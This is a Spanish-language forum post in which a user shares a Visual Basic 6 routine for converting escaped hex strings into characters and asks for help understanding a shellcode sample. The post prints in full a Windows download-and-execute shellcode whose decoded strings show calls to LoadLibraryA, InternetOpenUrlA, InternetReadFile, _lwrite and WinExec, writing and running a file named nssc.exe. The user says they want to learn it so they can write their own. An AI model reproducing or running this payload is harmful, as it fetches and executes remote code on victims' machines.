Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - lumbreras

#1
Bueno gracias por leer ... aqui viene mi codigo

Private Sub Command1_Click()
On Error Resume Next


    Dim sOriginal As String
    Dim sBuscar As String
    Dim sPoner As String
    Dim sbuf As String
    Dim fbuf As String
    Dim salto As Integer
    Dim contador As Integer
   

    sOriginal = Text2.Text
    sBuscar = "x"
    sPoner = "&H"
    salto = 1



    sbuf = Replace(sOriginal, sBuscar, sPoner, , , vbTextCompare)
   
    sBuscar = "\"
   
    sPoner = ""
   
    Text1.Text = Replace(sbuf, sBuscar, sPoner, , , vbTextCompare)
   
     sBuscar = """"
   
    sPoner = ""
   
    Text1.Text = Replace(Text1.Text, sBuscar, sPoner, , , vbTextCompare)
   
 
   
   
   
    Do Until contador = Len(Text1.Text) / 4
    fbuf = fbuf & Chr(Mid(Text1.Text, salto, 4))
    salto = salto + 4
    contador = contador + 1
    Loop
   
    Text3.Text = fbuf
   
End Sub

'text2.text sera igual en el formulario a
'\xEB\x30\x5F\xFC\x8B\xF7\x80""\x3F\x08\x75\x03\x80\x37\x08\x47\x80\x3F\x01\x75\xF2\x8B\xE6\x33\xD2\xB2\x04\xC1""\xE2\x08\x2B\xE2\x8B\xEC\x33\xD2\xB2\x03\xC1\xE2\x08\x2B\xE2\x54\x5A\xB2\x7C\x8B""\xE2\xEB\x02\xEB\x57\x89\x75\xFC\x33\xC0\xB4\x40\xC1\xE0\x08\x89\x45\xF8\x8B\x40""\x3C\x03\x45\xF8\x8D\x40\x7E\x8B\x40\x02\x03\x45\xF8\x8B\xF8\x8B\x7F\x0C\x03\x7D""\xF8\x81\x3F\x4B\x45\x52\x4E\x74\x07\x83\xC0\x14\x8B\xF8\xEB\xEB\x50\x8B\xF8\x33""\xC9\x33\xC0\xB1\x10\x8B\x17\x03\x55\xF8\x52\xEB\x03\x57\x8B\xD7\x80\x7A\x03\x80""\x74\x16\x8B\x32\x03\x75\xF8\x83\xC6\x02\xEB\x02\xEB\x7E\x8B\x7D\xFC\x51\xF3\xA6""\x59\x5F\x74\x06\x40\x83\xC7\x04\xEB\xDB\x5F\x8B\x7F\x10\x03\x7D\xF8\xC1\xE0\x02""\x03\xF8\x8B\x07\x8B\x5D\xFC\x8D\x5B\x11\x53\xFF\xD0\x89\x45\xF4\x8B\x40\x3C\x03""\x45\xF4\x8B\x70\x78\x03\x75\xF4\x8D\x76\x1C\xAD\x03\x45\xF4\x89\x45\xF0\xAD\x03""\x45\xF4\x89\x45\xEC\xAD\x03\x45\xF4\x89\x45\xE8\x8B\x55\xEC\x8B\x75\xFC\x8D\x76""\x1E\x33\xDB\x33\xC9\xB1\x0F\x8B\x3A\x03\x7D\xF4\x56\x51\xF3\xA6\x59\x5E\x74\x06""\x43\x8D
'x52\x04\xEB\xED\xD1\xE3\x8B\x75\xE8\x03\xF3\x33\xC9\x66\x8B\x0E\xEB\x02""\xEB\x7D\xC1\xE1\x02\x03\x4D\xF0\x8B\x09\x03\x4D\xF4\x89\x4D\xE4\x8B\x5D\xFC\x8D""\x5B\x2D\x33\xC9\xB1\x07\x8D\x7D\xE0\x53\x51\x53\x8B\x55\xF4\x52\x8B\x45\xE4\xFC""\xFF\xD0\x59\x5B\xFD\xAB\x8D\x64\x24\xF8\x38\x2B\x74\x03\x43\xEB\xF9\x43\xE2\xE1""\x8B\x45\xE0\x53\xFC\xFF\xD0\xFD\xAB\x33\xC9\xB1\x04\x8D\x5B\x0C\xFC\x53\x51\x53""\x8B\x55\xC4\x52\x8B\x45\xE4\xFF\xD0\x59\x5B\xFD\xAB\x38\x2B\x74\x03\x43\xEB\xF9""\x43\xE2\xE5\xFC\x33\xD2\xB6\x1F\xC1\xE2\x08\x52\x33\xD2\x52\x8B\x45\xD4\xFF\xD0""\x89\x45\xB0\x33\xD2\xEB\x02\xEB\x77\x52\x52\x52\x52\x53\x8B\x45\xC0\xFF\xD0\x8D""\x5B\x03\x89\x45\xAC\x33\xD2\x52\xB6\x80\xC1\xE2\x10\x52\x33\xD2\x52\x52\x8D\x7B""\x09\x57\x50\x8B\x45\xBC\xFF\xD0\x89\x45\xA8\x8D\x55\xA0\x52\x33\xD2\xB6\x1F\xC1""\xE2\x08\x52\x8B\x4D\xB0\x51\x50\x8B\x45\xB8\xFF\xD0\x8B\x4D\xA8\x51\x8B\x45\xB4""\xFF\xD0\x8B\x4D\xAC\x51\x8B\x45\xB4\xFF\xD0\x33\xD2\x52\x53\x8B\x45\xDC\xFF\xD0""\x89\x45\xA4\x8B\x7D\xA0\x57\x8B\x55\xB0\x52\x5
'\x8B\x45\xD8\xFF\xD0\x8B\x55\xA4""\x52\x8B\x45\xD0\xFF\xD0\xEB\x02\xEB\x12\x33\xD2\x90\x52\x53\x8B\x45\xCC\xFF\xD0""\x33\xD2\x52\x8B\x45\xC8\xFF\xD0\xE8\xE6\xFD\xFF\xFF\x47\x65\x74\x4D\x6F\x64\x75""\x6C\x65\x48\x61\x6E\x64\x6C\x65\x41\x08\x6B\x65\x72\x6E\x65\x6C\x33\x32\x2E\x64""\x6C\x6C\x08\x47\x65\x74\x50\x72\x6F\x63\x41\x64\x64\x72\x65\x73\x73\x08\x4C\x6F""\x61\x64\x4C\x69\x62\x72\x61\x72\x79\x41\x08\x5F\x6C\x63\x72\x65\x61\x74\x08\x5F""\x6C\x77\x72\x69\x74\x65\x08\x47\x6C\x6F\x62\x61\x6C\x41\x6C\x6C\x6F\x63\x08\x5F""\x6C\x63\x6C\x6F\x73\x65\x08\x57\x69\x6E\x45\x78\x65\x63\x08\x45\x78\x69\x74\x50""\x72\x6F\x63\x65\x73\x73\x08\x77\x69\x6E\x69\x6E\x65\x74\x2E\x64\x6C\x6C\x08\x49""\x6E\x74\x65\x72\x6E\x65\x74\x4F\x70\x65\x6E\x41\x08\x49\x6E\x74\x65\x72\x6E\x65""\x74\x4F\x70\x65\x6E\x55\x72\x6C\x41\x08\x49\x6E\x74\x65\x72\x6E\x65\x74\x52\x65""\x61\x64\x46\x69\x6C\x65\x08\x49\x6E\x74\x65\x72\x6E\x65\x74\x43\x6C\x6F\x73\x65""\x48\x61\x6E\x64\x6C\x65\x08\x4E\x53\x08\x6E\x73\x73\x63\x2E\x65\x78\x65\x08"
'lo escribo directamente en el formulario por q no encontre la manera de igualar text2.text con estos parametros sin limpiar primero a mano las "
'solo es un ejemplo de shellcode descargado del web al igual q no consegui q mi programa limpie los (enter) y tengo q quitarlas en un editor de textos a mano antes de copiarlas al text2.text


Mis preguntas son varias ....

- Como puedo hacer para limpiar con mi programa las " y los enter &HD en decimal 13 y en general cualquier caracter ascii q no puedo tipear directamente del teclado o q entra en conflicto en el codigo por usarse dentro del codigo para otros menesteres ...

- Entender basicamente q cojones esta escrito en esta shell code .... mi resultado de traduccion despues de limpiar a mano los enter (aunq las comillas si me las limpia si escribo directamente en el formulario) fue este ...

ë0_ü‹÷€?u€7G€?uò‹æ3Ò²Áâ+‹ì3Ò²Áâ+âTZ²|‹âëëW‰uü3À´@Áà‰Eø‹@<Eø@~‹@Eø‹ø‹ }ø?KERNtƒÀ‹øëëP‹ø3É3À±‹UøRëW‹×€z€t‹2uøƒÆëë~‹}üQó¦Y_t@ƒÇëÛ_‹}øÁàø‹‹]ü[SÿЉEô‹@<Eô‹pxuôv­Eô‰Eð­Eô‰Eì­Eô‰Eè‹Uì‹uüv3Û3ɱ‹:}ôVQó¦Y^tCRëíÑã‹uèó3Éf‹ëë}ÁáMð‹   Mô‰Mä‹]ü[-3ɱ}àSQS‹UôR‹EäüÿÐY[ý«d$ø8+tCëùCâá‹EàSüÿÐý«3ɱ[ üSQS‹UÄR‹EäÿÐY[ý«8+tCëùCâåü3Ò¶ÁâR3ÒR‹EÔÿЉE°3ÒëëwRRRRS‹EÀÿЍ[‰E¬3ÒR¶€ÁâR3ÒRR{   WP‹E¼ÿЉE¨U R3Ò¶ÁâR‹M°QP‹E¸ÿЋM¨Q‹E´ÿЋM¬Q‹E´ÿÐ3ÒRS‹EÜÿЉE¤‹} W‹U°RP‹EØÿЋU¤R‹EÐÿÐëë3ҐRS‹EÌÿÐ3ÒR‹EÈÿÐèæýÿÿGetModuleHandleAkernel32.dllGetProcAddressLoadLibraryA_lcreat_lwriteGlobalAlloc_lcloseWinExecExitProcesswininet.dllInternetOpenAInternetOpenUrlAInternetReadFileInternetCloseHandleNSnssc.exe

Bueno el final parece estar algo claro al menos ay por donde empezar pero todosa esos demas caracteres q ay desde le principioooo , bueno si quiero programarme una debo entenderlo y esq no consigo encontra ay instrucciones de ensamblador ni nada .......
gracias todos por su tiempo